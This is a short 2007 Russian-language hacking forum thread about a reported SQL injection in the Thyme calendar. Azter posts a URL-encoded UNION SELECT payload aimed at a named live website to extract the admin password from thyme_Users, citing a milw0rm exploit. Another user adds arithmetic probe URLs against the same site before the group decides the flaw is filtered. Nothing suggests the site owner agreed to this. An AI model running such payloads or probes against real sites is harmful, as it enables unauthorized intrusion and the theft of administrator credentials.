Странная бага

Discussion in 'Уязвимости' started by Azter, 16 Jul 2007.

  1. Azter

    Azter Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    44
    Likes Received:
    3
    Reputations:
    0
    В общем вот такой сайт
    hxxp://www.ypsielbow.com/thyme/
    нашел багу под календарь
    hxxp://www.milw0rm.com/exploits/3895, но толи я не правильно понял толи что-т с багой не так, но когда делаю запрос
    Code:
    http://www.ypsielbow.com/thyme/event_view.php?eid=34%20UNION%20SELECT%20pass%20FROM%20thyme_Users%20WHERE%20username%20=%20%22admin%22
    Но в коде страницы ничего нету =(
     
    1 person likes this.
  2. delay(0)

    delay(0) Member

    Joined:
    22 Nov 2006
    Messages:
    90
    Likes Received:
    41
    Reputations:
    6
    Походил ещё по паре календарей, везде параметры фильтруются. Милворм врёт?
     
  3. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    Нету там скули..
    Code:
    http://www.ypsielbow.com/thyme/event_view.php?eid=35-1
    Code:
    http://www.ypsielbow.com/thyme/event_view.php?eid=34
     
  4. Azter

    Azter Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    44
    Likes Received:
    3
    Reputations:
    0
    Isis
    и такое чувство что ее нигде нет...просто я тоже подумал что может пропатчено, но посмотрел еще 3-4 сайта тот-же результат.